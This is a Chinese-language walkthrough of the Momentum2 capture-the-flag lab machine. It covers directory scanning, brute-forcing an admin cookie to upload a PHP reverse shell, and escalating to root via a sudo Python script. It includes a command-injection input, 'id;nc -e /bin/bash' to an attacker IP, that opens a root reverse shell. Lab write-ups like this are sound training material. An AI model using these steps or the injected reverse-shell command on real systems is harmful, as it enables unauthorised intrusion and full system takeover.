Momentum2
信息搜集:
首先进行Ip扫描
打开网页进行查看
进行端口扫描
发现他开启了22和80端口
进行目录扫描:gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.181.140/ -x html,php,bak,txt -t 20
渗透测试
在/dashboard.html发现可以文件上传
发现可以上传txt文件但是不可以上传php文件
上文中发现ajax.php.bak
代码的意思就是当cookie存在时,键名为admin,可以上传php,pdf,txt文件,但是admin需要一个值,这个值是一个大写字母,还要使用post方式提交一个参数secure;最后上传成功时会返回一个1
crunch 1 1 -t , -o pass.txt(-t , 插入大写字母)
上面是生成的 大写字母的文档
于是使用brupsuit进行破解模块(这是抓取的数据包)
首先删除
X-Forwarded-For: 192.168.212.139
X-Originating-IP: 192.168.212.143
X-Remote-IP: 192.168.212.143
然后添加Cookie: admin=&G6u@B6uDXMq&Ms和 secure,val1d
返回1,所以文件上传成功
运行111.php 文件,可以反弹shell
python -c 'import pty; pty.spawn("/bin/bash")'
id查看当前的属主和属组
在/home/athena看到第一个flag
提权:
发现一个密码文件
进行查看
经过测试
用户名为athena 密码为myvulnerableapp*,并切换到该用户su - athena
使用sudo -l行提权
我们对这个获取root权限文件进行查看
先运行sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py
然后输入id;nc -e /bin/bash 192.168.181.129 5555
并在kali上进行监听5555端口
于是获得root的shell
在/root 下获得最终的flag